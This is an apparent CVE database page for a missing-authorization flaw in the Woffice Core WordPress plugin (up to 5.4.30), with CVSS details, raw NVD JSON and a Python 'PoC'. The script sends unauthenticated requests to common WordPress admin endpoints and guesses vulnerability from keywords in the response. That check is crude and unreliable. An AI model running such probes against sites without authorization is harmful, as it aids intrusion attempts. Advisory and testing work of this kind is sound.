Security Vulnerability Report
中文
CVE-2025-67566 CVSS 5.3 MEDIUM

CVE-2025-67566

Published: 2025-12-09 16:18:33
Last Modified: 2026-04-27 18:16:44

Description

Missing Authorization vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woffice Core: from n/a through <= 5.4.30.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Woffice Core <= 5.4.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67566 PoC - Woffice Core Missing Authorization # This PoC demonstrates accessing protected functionality without authorization import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-67566 Missing Authorization in Woffice Core """ # Common Woffice Core endpoints that may be affected vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/woffice/v1/', '/wp-admin/admin.php?page=woffice', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-67566 - Woffice Core Missing Authorization") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester/1.0' } response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"\n[*] Testing endpoint: {endpoint}") print(f" Status Code: {response.status_code}") # Check if we can access protected content if response.status_code == 200: # Analyze response for signs of unauthorized access if 'admin' in response.text.lower() or 'dashboard' in response.text.lower(): print(f" [!] Potential unauthorized access detected!") print(f" [!] Response length: {len(response.text)} bytes") return True except requests.RequestException as e: print(f" [ERROR] Request failed: {e}") print("\n[-] Vulnerability check completed") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-67566.py <target_url>") print("Example: python cve-2025-67566.py http://example.com") sys.exit(1) target = sys.argv[1] vulnerable = check_vulnerability(target) if vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2025-67566") print("[!] Recommendation: Update Woffice Core to version > 5.4.30") else: print("\n[*] Target does not appear to be vulnerable or Woffice Core not detected") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67566", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:33.270", "lastModified": "2026-04-27T18:16:43.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woffice Core: from n/a through <= 5.4.30."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woffice-core/vulnerability/wordpress-woffice-core-plugin-5-4-30-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}